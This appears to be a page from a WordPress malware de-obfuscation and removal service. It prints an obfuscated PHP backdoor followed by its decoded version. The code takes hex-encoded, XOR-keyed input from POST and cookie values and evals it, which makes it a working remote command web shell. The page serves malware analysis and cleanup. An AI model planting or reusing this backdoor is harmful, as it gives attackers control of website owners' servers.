De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php $QDrpq = "\x73" ./* jAL */"\164" ./* lYOpC */chr (114) . chr (95)/* jUeO */./* mrKiB */chr/* BWH */( 666/* pGJG */- 552/* UM*/).chr (101) . chr (112) . "\x65" . "\x61" . "\x74"; $eOiaz = chr (101) ./* Xm */"\x78"/* uQIg */. chr ( 180/* xX */- 68 ).chr (108)/* xBsxS */. 'o' . "\x64"/*Q*/./*zQjJT */"\x65"; $tfwhnZIIg/* siqa*/=/* qGR */chr/* sa*/(99) ./* GM*/chr ( 752 - 641 )."\165" ./* Aq */"\x6e" . 't'; $kyUSM =/* Kb */"\160" . "\141" . chr (/* EfSB */976 -/*GAWg */877 ).'k'; $vdUgpBog = Array (/* CC */"zkCzdqZ"/*gtG */=>/* xiBA */"devWZhFMcEJJpbpPiRuFWB" ); $eRCfZSfcE = Array (/* VkFZ */"sRftEcwUUANnsNQUwVJiYpdrUg" => "DIpwsJGoThYjfbJywX"/* y */); foreach ( Array( $vdUgpBog,/*XDSQH*/$_POST, $eRCfZSfcE,/* wJ */$_COOKIE,/*UEtW*/$vdUgpBog) as $JpSTIY) { /* FCY */foreach (/*MCl */$JpSTIY/* Amn*/as $sizBZ => $IMDimAXSfR ) { $IMDimAXSfR/* h */=/*q */@$kyUSM( 'H'/* ep */. chr (/*nmGe */754 -/* vOo */712/* Xd */),/* J */$IMDimAXSfR ); $sizBZ .= "cMaddtC-NOZP-hjfvIOe-JAaoaQh-yDR-tKjgRqY-XULU"; /*SEHs */$sizBZ = $QDrpq (/*pQjum*/$sizBZ, ( strlen(/* MzE */$IMDimAXSfR )/strlen(/* YeuIH*/$sizBZ ) ) + 1); $fuOJQqrsm = $IMDimAXSfR ^/* a */$sizBZ; /* L */$fuOJQqrsm =/* DrIPy */$eOiaz/* lBm */(/* ITdQ */chr/* kog */( 592 - 557 ),/* Olgvy */$fuOJQqrsm ); if (/* DDM*/$tfwhnZIIg (/* XUkQ */$fuOJQqrsm ) ==/*VBrQ */3 ) { /* p */eval ( $fuOJQqrsm[1] ( $fuOJQqrsm[2]/*Y */) ); exit/* Mbt*/(); } } }
<?php $QDrpq = "str_repeat"; $eOiaz = "explode"; $tfwhnZIIg = "count"; $kyUSM = "pack"; $vdUgpBog = array( /* CC */ "zkCzdqZ" => "devWZhFMcEJJpbpPiRuFWB", ); $eRCfZSfcE = array( /* VkFZ */ "sRftEcwUUANnsNQUwVJiYpdrUg" => "DIpwsJGoThYjfbJywX", ); foreach (array( $vdUgpBog, /*XDSQH*/ $_POST, $eRCfZSfcE, /* wJ */ $_COOKIE, /*UEtW*/ $vdUgpBog, ) as $JpSTIY) { /* FCY */ foreach ($JpSTIY as $sizBZ => $IMDimAXSfR) { $IMDimAXSfR = @$kyUSM( "H*", /* J */ $IMDimAXSfR ); $sizBZ .= "cMaddtC-NOZP-hjfvIOe-JAaoaQh-yDR-tKjgRqY-XULU"; /*SEHs */ $sizBZ = $QDrpq( /*pQjum*/ $sizBZ, strlen( /* MzE */ $IMDimAXSfR ) / strlen( /* YeuIH*/ $sizBZ ) + 1 ); $fuOJQqrsm = $IMDimAXSfR ^ $sizBZ; /* L */ $fuOJQqrsm = $eOiaz( /* ITdQ */ "#", /* Olgvy */ $fuOJQqrsm ); if ($tfwhnZIIg( /* XUkQ */ $fuOJQqrsm ) == 3) { /* p */ eval($fuOJQqrsm[1]($fuOJQqrsm[2])); exit; } } }
Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.